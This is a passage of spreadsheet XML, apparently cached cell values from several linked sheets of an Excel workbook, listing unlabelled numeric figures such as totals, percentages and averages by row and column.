            <v>17023.71</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>3723</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4245.55</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>16220.86</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>446</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>20106.23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353.900000000001</v>
          </cell>
        </row>
        <row r="29">
          <cell r="V29">
            <v>168</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>3985.257</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>70.8278985507246</v>
          </cell>
          <cell r="V68">
            <v>71.5044351073763</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>263.636596158273</v>
          </cell>
          <cell r="Y68">
            <v>266.206969721701</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>69.1394927536232</v>
          </cell>
          <cell r="V69">
            <v>68.4235527544351</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.5925764408544</v>
          </cell>
          <cell r="Y69">
            <v>25.1966540548776</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.00</v>
          </cell>
          <cell r="R71" t="str">
            <v>285.50</v>
          </cell>
          <cell r="S71" t="str">
            <v>4312.00</v>
          </cell>
          <cell r="T71">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U71">
            <v>51.7210144927536</v>
          </cell>
          <cell r="V71">
            <v>50.3267973856209</v>
          </cell>
          <cell r="W71">
            <v>242.5</v>
          </cell>
          <cell r="X71">
            <v>219.159369527145</v>
          </cell>
          <cell r="Y71">
            <v>213.87517393321</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>14.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>344.17</v>
          </cell>
          <cell r="S72" t="str">
            <v>4412.67</v>
          </cell>
          <cell r="T72">
            <v>58.3333333333333</v>
          </cell>
          <cell r="U72">
            <v>62.3496376811594</v>
          </cell>
          <cell r="V72">
            <v>51.5017507002801</v>
          </cell>
          <cell r="W72">
            <v>63.2857142857143</v>
          </cell>
          <cell r="X72">
            <v>63.9480489293082</v>
          </cell>
          <cell r="Y72">
            <v>61.492021837119</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>14.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>352.17</v>
          </cell>
          <cell r="S73" t="str">
            <v>4548.38</v>
          </cell>
          <cell r="T73">
            <v>58.3333333333333</v>
          </cell>
          <cell r="U73">
            <v>63.7989130434783</v>
          </cell>
          <cell r="V73">
            <v>53.0856676003735</v>
          </cell>
          <cell r="W73">
            <v>64.0714285714286</v>
          </cell>
          <cell r="X73">
            <v>61.532782463015</v>
          </cell>
          <cell r="Y73">
            <v>62.8096706959401</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="23">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3587</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>63689.796</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>4817</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>5357.45</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>60286.53</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>191.4</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>7284.78</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>181.78</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>16841.93</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>4817</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4276.27</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>16761.59</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>708</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>19398.23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202</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>3783.257</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>67.8767361111111</v>
          </cell>
          <cell r="V68">
            <v>71.3047020484171</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>263.636596158273</v>
          </cell>
          <cell r="Y68">
            <v>266.206969721701</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>66.2586805555555</v>
          </cell>
          <cell r="V69">
            <v>68.2324255121043</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.5925764408544</v>
          </cell>
          <cell r="Y69">
            <v>25.1966540548776</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.00</v>
          </cell>
          <cell r="R71" t="str">
            <v>293.50</v>
          </cell>
          <cell r="S71" t="str">
            <v>4320.00</v>
          </cell>
          <cell r="T71">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U71">
            <v>50.9548611111111</v>
          </cell>
          <cell r="V71">
            <v>50.2793296089386</v>
          </cell>
          <cell r="W71">
            <v>245.25</v>
          </cell>
          <cell r="X71">
            <v>219.870528109029</v>
          </cell>
          <cell r="Y71">
            <v>213.933275462963</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>368.17</v>
          </cell>
          <cell r="S72" t="str">
            <v>4436.67</v>
          </cell>
          <cell r="T72">
            <v>100</v>
          </cell>
          <cell r="U72">
            <v>63.9184027777778</v>
          </cell>
          <cell r="V72">
            <v>51.6372206703911</v>
          </cell>
          <cell r="W72">
            <v>59.8333333333333</v>
          </cell>
          <cell r="X72">
            <v>63.6798218214412</v>
          </cell>
          <cell r="Y72">
            <v>61.4830492238548</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>376.17</v>
          </cell>
          <cell r="S73" t="str">
            <v>4572.38</v>
          </cell>
          <cell r="T73">
            <v>100</v>
          </cell>
          <cell r="U73">
            <v>65.3072916666667</v>
          </cell>
          <cell r="V73">
            <v>53.2167132216015</v>
          </cell>
          <cell r="W73">
            <v>59.125</v>
          </cell>
          <cell r="X73">
            <v>61.3791636759976</v>
          </cell>
          <cell r="Y73">
            <v>62.7903302000271</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="24">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3373</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>59013.266</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>4606</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>7211.82999999999</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>57680.7</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>208.92</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>7075.86</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>950</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>218</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>17573.93</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>3656</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>5923.40999999999</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>14494.18</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>861.5</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>18536.73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193</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>3590.257</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>1303.53</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>65.1616666666667</v>
          </cell>
          <cell r="V68">
            <v>71.1060817084494</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>263.636596158273</v>
          </cell>
          <cell r="Y68">
            <v>266.206969721701</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>63.6083333333333</v>
          </cell>
          <cell r="V69">
            <v>68.0423630454967</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.5925764408544</v>
          </cell>
          <cell r="Y69">
            <v>25.1966540548776</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.00</v>
          </cell>
          <cell r="R71" t="str">
            <v>301.50</v>
          </cell>
          <cell r="S71" t="str">
            <v>4328.00</v>
          </cell>
          <cell r="T71">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U71">
            <v>50.25</v>
          </cell>
          <cell r="V71">
            <v>50.2321262766945</v>
          </cell>
          <cell r="W71">
            <v>233.375</v>
          </cell>
          <cell r="X71">
            <v>220.228855721393</v>
          </cell>
          <cell r="Y71">
            <v>213.969212107209</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>392.17</v>
          </cell>
          <cell r="S72" t="str">
            <v>4460.67</v>
          </cell>
          <cell r="T72">
            <v>100</v>
          </cell>
          <cell r="U72">
            <v>65.3616666666667</v>
          </cell>
          <cell r="V72">
            <v>51.7719359331476</v>
          </cell>
          <cell r="W72">
            <v>59.7083333333333</v>
          </cell>
          <cell r="X72">
            <v>63.4367748680419</v>
          </cell>
          <cell r="Y72">
            <v>61.4735006176202</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>22.50</v>
          </cell>
          <cell r="R73" t="str">
            <v>398.67</v>
          </cell>
          <cell r="S73" t="str">
            <v>4594.88</v>
          </cell>
          <cell r="T73">
            <v>93.75</v>
          </cell>
          <cell r="U73">
            <v>66.445</v>
          </cell>
          <cell r="V73">
            <v>53.3296193129062</v>
          </cell>
          <cell r="W73">
            <v>58.0444444444444</v>
          </cell>
          <cell r="X73">
            <v>61.1909599418065</v>
          </cell>
          <cell r="Y73">
            <v>62.7670907618915</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="25">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2042</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>54251.626</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>2888</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>5133.34000000001</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>55435.36</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>117.1</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>6958.76</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>989</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>142.4</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>18420.53</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>1899</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4087.84000000001</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>12305.34</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>786</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>17750.73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689.86</v>
          </cell>
        </row>
        <row r="29">
          <cell r="V29">
            <v>207</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>4073.117</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>2719.64</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>62.6554487179487</v>
          </cell>
          <cell r="V68">
            <v>70.9085648148148</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>263.636596158273</v>
          </cell>
          <cell r="Y68">
            <v>266.206969721701</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>61.161858974359</v>
          </cell>
          <cell r="V69">
            <v>67.8533564814815</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.5925764408544</v>
          </cell>
          <cell r="Y69">
            <v>25.1966540548776</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R71" t="str">
            <v>301.50</v>
          </cell>
          <cell r="S71" t="str">
            <v>4328.00</v>
          </cell>
          <cell r="T71">
            <v>0</v>
          </cell>
          <cell r="U71">
            <v>48.3173076923077</v>
          </cell>
          <cell r="V71">
            <v>50.0925925925926</v>
          </cell>
          <cell r="W71">
            <v>0</v>
          </cell>
          <cell r="X71">
            <v>220.228855721393</v>
          </cell>
          <cell r="Y71">
            <v>213.969212107209</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>416.17</v>
          </cell>
          <cell r="S72" t="str">
            <v>4484.67</v>
          </cell>
          <cell r="T72">
            <v>100</v>
          </cell>
          <cell r="U72">
            <v>66.6939102564103</v>
          </cell>
          <cell r="V72">
            <v>51.9059027777778</v>
          </cell>
          <cell r="W72">
            <v>61.7083333333333</v>
          </cell>
          <cell r="X72">
            <v>63.3370978206022</v>
          </cell>
          <cell r="Y72">
            <v>61.4747573400049</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>422.67</v>
          </cell>
          <cell r="S73" t="str">
            <v>4618.88</v>
          </cell>
          <cell r="T73">
            <v>100</v>
          </cell>
          <cell r="U73">
            <v>67.7355769230769</v>
          </cell>
          <cell r="V73">
            <v>53.4592592592593</v>
          </cell>
          <cell r="W73">
            <v>58.625</v>
          </cell>
          <cell r="X73">
            <v>61.0452598954267</v>
          </cell>
          <cell r="Y73">
            <v>62.745568189691</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="26">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4129</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>48692.156</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>5405</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>4770.26</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>56070.1</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>55.7799999999997</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>6902.98</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>609.34</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>17811.19</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>5405</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3439.14</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>14271.2</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>666</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>17084.73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244</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>3829.117</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>1430.47</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>60.3348765432099</v>
          </cell>
          <cell r="V68">
            <v>70.7121421975993</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>263.636596158273</v>
          </cell>
          <cell r="Y68">
            <v>266.206969721701</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>58.8966049382716</v>
          </cell>
          <cell r="V69">
            <v>67.6653970452447</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.5925764408544</v>
          </cell>
          <cell r="Y69">
            <v>25.1966540548776</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>11.50</v>
          </cell>
          <cell r="R71" t="str">
            <v>313.00</v>
          </cell>
          <cell r="S71" t="str">
            <v>4339.50</v>
          </cell>
          <cell r="T71">
            <v>47.9166666666667</v>
          </cell>
          <cell r="U71">
            <v>48.3024691358025</v>
          </cell>
          <cell r="V71">
            <v>50.0865650969529</v>
          </cell>
          <cell r="W71">
            <v>230</v>
          </cell>
          <cell r="X71">
            <v>220.58785942492</v>
          </cell>
          <cell r="Y71">
            <v>214.011694895725</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>440.17</v>
          </cell>
          <cell r="S72" t="str">
            <v>4508.67</v>
          </cell>
          <cell r="T72">
            <v>100</v>
          </cell>
          <cell r="U72">
            <v>67.9274691358025</v>
          </cell>
          <cell r="V72">
            <v>52.0391274238227</v>
          </cell>
          <cell r="W72">
            <v>57.75</v>
          </cell>
          <cell r="X72">
            <v>63.0324647295363</v>
          </cell>
          <cell r="Y72">
            <v>61.4549301678766</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>446.67</v>
          </cell>
          <cell r="S73" t="str">
            <v>4642.88</v>
          </cell>
          <cell r="T73">
            <v>100</v>
          </cell>
          <cell r="U73">
            <v>68.9305555555556</v>
          </cell>
          <cell r="V73">
            <v>53.5881809787627</v>
          </cell>
          <cell r="W73">
            <v>57.25</v>
          </cell>
          <cell r="X73">
            <v>60.8413370049477</v>
          </cell>
          <cell r="Y73">
            <v>62.7171604693638</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="27">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3112</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>45580.156</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>4098</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>6047.37</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>54120.73</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>151.64</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>6751.34</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>1256</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>283.62</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>18783.57</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>2842</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4520.11</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>12593.09</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>1092</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>15992.73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180</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>3649.117</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>58.1800595238095</v>
          </cell>
          <cell r="V68">
            <v>70.5168047882136</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>263.636596158273</v>
          </cell>
          <cell r="Y68">
            <v>266.206969721701</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>56.7931547619048</v>
          </cell>
          <cell r="V69">
            <v>67.4784760589319</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.5925764408544</v>
          </cell>
          <cell r="Y69">
            <v>25.1966540548776</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>11.50</v>
          </cell>
          <cell r="R71" t="str">
            <v>324.50</v>
          </cell>
          <cell r="S71" t="str">
            <v>4351.00</v>
          </cell>
          <cell r="T71">
            <v>47.9166666666667</v>
          </cell>
          <cell r="U71">
            <v>48.2886904761905</v>
          </cell>
          <cell r="V71">
            <v>50.0805709023941</v>
          </cell>
          <cell r="W71">
            <v>247.130434782609</v>
          </cell>
          <cell r="X71">
            <v>221.528505392912</v>
          </cell>
          <cell r="Y71">
            <v>214.099230062055</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>10.33</v>
          </cell>
          <cell r="R72" t="str">
            <v>450.50</v>
          </cell>
          <cell r="S72" t="str">
            <v>4519.00</v>
          </cell>
          <cell r="T72">
            <v>43.0416666666667</v>
          </cell>
          <cell r="U72">
            <v>67.0386904761905</v>
          </cell>
          <cell r="V72">
            <v>52.0142725598527</v>
          </cell>
          <cell r="W72">
            <v>60.0193610842207</v>
          </cell>
          <cell r="X72">
            <v>62.9633740288568</v>
          </cell>
          <cell r="Y72">
            <v>61.4516485948219</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>10.33</v>
          </cell>
          <cell r="R73" t="str">
            <v>457.00</v>
          </cell>
          <cell r="S73" t="str">
            <v>4653.22</v>
          </cell>
          <cell r="T73">
            <v>43.0416666666667</v>
          </cell>
          <cell r="U73">
            <v>68.0059523809524</v>
          </cell>
          <cell r="V73">
            <v>53.5591620626151</v>
          </cell>
          <cell r="W73">
            <v>61.568247821878</v>
          </cell>
          <cell r="X73">
            <v>60.8577680525164</v>
          </cell>
          <cell r="Y73">
            <v>62.7144751376466</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="28">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2667</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>41545.226</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>3489</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>4773.24999999999</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>52836.48</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>294.48</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>6456.86</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>1392</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>434.78</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
